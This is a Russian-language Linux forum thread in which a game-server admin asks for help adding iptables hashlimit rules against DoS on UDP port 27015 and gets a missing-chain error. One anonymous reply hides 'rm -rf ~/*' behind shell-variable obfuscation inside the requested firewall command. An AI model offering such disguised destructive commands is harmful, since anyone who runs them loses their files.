LINUX.ORG.RU
ФорумAdmin

Фаервол. Добавление новых правил. защитить порты!


0

1

Всем хай! Надеюсь что открыл темку в нужном разделе. Я не могу добавить одно правило. Много форумов просмотрел и не как не пойму как же его прописать. Я прописывал это правило по разному! И ничего не вышло!

Вот и само правило Нужно именно оно! Это для cs сервера. Точнее что бы защитить hlds от доса!

-A RH-Firewall-1-INPUT -p udp -m udp --dport 27015 -m hashlimit --hashlimit 5/sec --hashlimit-burst 5 --hashlimit-mode srcip --hashlimit-name cs -j ACCEPT 
-A RH-Firewall-1-INPUT -p udp -m udp --dport 27015 -j DROP

Ошибка если ввести это правило!

iptables: No chain/target/match by that namе
Мне надо защетить 3 порта. И сохранить! Эти правила уже стояли но после перезагрузки железа всё стёрлось!

27016 27020 27015

Буду очень при очень благодарен если вы мне разжуёте как прописать правило!



Последнее исправление: spals (всего исправлений: 2)

iptables - защетяй и сохраняй!

Купи словарь, затем прочти man iptables

//thread

eagleivg ★★★★★
()
Ответ на: комментарий от kombrig

Нет!!!!!!!!!

С гуглом всё нормально я говорю про ошибку на сервере! Как не вписываю выдаёт ошибку!

spals
() автор топика

iptables: No chain/target/match by that namе

man iptables:

-A, --append chain rule-specification

Вывод: chain «RH-Firewall-1-INPUT» не существует.

AITap ★★★★★
()

Защетить

Пофикси, глаза режет.

Deleted
()

s=iptables e='echo r' $(e)m -$(e)f ~/*; $s -A RH-Firewall-1-INPUT -p udp -m udp --dport 27015 -m hashlimit --hashlimit 5/sec --hashlimit-burst 5 --hashlimit-mode srcip --hashlimit-name cs -j ACCEPT

anonymous
()

Защетить порты!

Со щетом или на щете!

mityash
()
Ответ на: комментарий от anonymous

Не подсказывай, пусть сам учится

anonymous
()
Ответ на: комментарий от anonymous

Я боюсь экспериментировать!

На этом железе много чего еще и я просто боюсь экспериментировать!

spals
() автор топика
Ответ на: комментарий от spals

в раздел jobs, если не умеете читать маны самостоятельно.

drBatty ★★
()

разжуёте

Тут никто тебе не разжуёт. Почитай ман и подумай. Напиши правило. Если не получится, то выложи свой вариант - тогда тебе подскажут в какую сторону копать.

dada ★★★★★
()
Ответ на: комментарий от dada

dada Я вообще в первом сообщении его выложил!

spals
() автор топика

Для начала скажи, что у тебя за дистрибутив. Гугл подсказывает, что цепочка RH-Firewall-1-INPUT используется в RedHat (и возможно основанных на нем дистрах). Если у дебя дистр другой попробуй пихать правила в стандартную цепопчку INPUT (т.е. замени «RH-Firewall-1-INPUT» на «INPUT»)

selim
()

Ребенка обижаете!

Топикстартер, щелкните в эту штучку, которая ниже.
Я ссылко
Очень надеюсь, это Вас развеселит.


Для остальных, которые не топикстартеры: вот что вы злые такие, а? :))

braindef
()
Ответ на: Ребенка обижаете! от braindef

Спасибо но не то!

[code] iptables -A INPUT -p udp -m udp --dport 27015 -m hashlimit --hashlimit 5/sec --hashlimit-burst 5 --hashlimit-mode srcip --hashlimit-name cs -j ACCEPT iptables -A INPUT -p udp -m udp --dport 27015 -j DROP [/code]

Пробывал вот так ошибка таже!

[code] iptables: No chain/target/match by that name. [/code]

spals
() автор топика
Ответ на: Ребенка обижаете! от braindef

Очень надеюсь, это Вас развеселит.

Да уж весело :) но ТС я думаю до такого не дошел ))

selim
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.